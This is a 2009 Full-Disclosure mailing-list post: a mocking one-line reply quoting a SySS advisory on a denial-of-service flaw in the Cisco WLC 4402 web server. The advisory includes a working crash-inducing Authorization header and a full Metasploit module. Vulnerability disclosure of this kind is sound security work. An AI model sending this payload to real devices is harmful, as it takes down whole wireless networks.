that was a crappy disclosure. where is the .exe file with the gui?
at least make it in visual basic so i can have an interface just send it to me in a zip then itll be useful to the intelligence community n3td3v / antisec On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- Christoph Bott <[email protected]> wrote: >======================================= >Vulnerable Product: Cisco WLC 4402 (most likely among many others) >Vulnerability discovered: January 2009 >Reported to vendor: Jan 01, 2009 >Fix available: not yet >======================================= > > >TIMELINE: >--------------------------------------------------- >+ 01/11/2009: discovered vulnerability on a customer's site > >+ 01/13/2009: initial vendor contact via [email protected] > >+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631 > >+ 02/09/2009: vendor states, that bugfix is _not_ contained within >cisco-sa-20090204-wlc > >+ 03/30/2009: vendor states: "We have a fix for this issue. >However, >due to some other issues we are investigating we may not make this >public until about 42 days." > >+ 06/02/2009: vendor states: "I really apologize for the delay on >publishing this advisory. The reason that we have not publish is >because >we are also incorporating other security fixes within all the >affected >releases. We WILL be publishing the advisory on July 8th, 2009 at >1600 UTC." > >+ 07/24/2009: Customer agreed with full disclosure > >+ 07/26/2009: Still no fixes available; full disclosure due to >lacking >vendor activities. > > > >PRODUCT: >--------------------------------------------------- >The Cisco WLC 4402 is a Wireless LAN Controller, which is >manageable via >an integrated embedded webserver (emweb httpd). > > > >AFFECTED VERSIONS: >--------------------------------------------------- >The vulnerability described below could have been verified on WLC >4402, >software release 5.1.151.0. However, since the vulnerability >affects the >integrated embedded emweb http daemon, several other products >and/or >software releases might be affected, too. > > > >VULNERABILITY: >--------------------------------------------------- >Using long, random authentication data, the embedded web server >can be >crashed, which leeds to a device reboot. Subsequently repeated >requests >lead to a permanent denial of service of the WLC (and therefore of >the >whole wireless infrastructure). > > > >EXPLOIT: >--------------------------------------------------- >Not needed. > >One only has to call >"/screens/frameset.html" >and provide Basic Authentication data which uses >a username and password longer than 63 characters each. > >The following header worked for me: >Authorization: Basic >MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA >xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT >Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0 > > >The following code snippet can be used as a module within the >metasploit >framework: > >---- snip ----- >require 'msf/core' > > >class Metasploit3 < Msf::Auxiliary > > include Msf::Exploit::Remote::Tcp > include Msf::Auxiliary::Dos > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'Cisco WLC 4200 Basic >Auth >Denial of Service', > 'Description' => %q{ > > This module triggers a Denial of >Service >condition in the Cisco WLC 4200 > HTTP server. By sending a GET >request >with long authentication data, the > device becomes unresponsive and >reboots. >Firmware is reportedly vulnerable. > }, > 'Author' => [ 'Christoph >Bott ><msf[at]bott.syss.de>' ], > 'License' => MSF_LICENSE, > 'Version' => '$Revision: 5949 $', > 'References' => > [ > [ 'BID', '???'], > [ 'CVE', '???'], > [ 'URL', >'http://www.cisco.com/?????'], > ], > 'DisclosureDate' => 'January 26 2009')) > > register_options( > [ > Opt::RPORT(80), > ], self.class) > > end > > def run > connect > > print_status("Sending HTTP DoS packet") > > sploit = > "GET /screens/frameset.html HTTP/1.0\r\n" >+ > "Authorization: Basic >MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA >xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT >Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0" > > sock.put(sploit + "\r\n") > > disconnect > end > >end > >---- snip ---- > > > > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
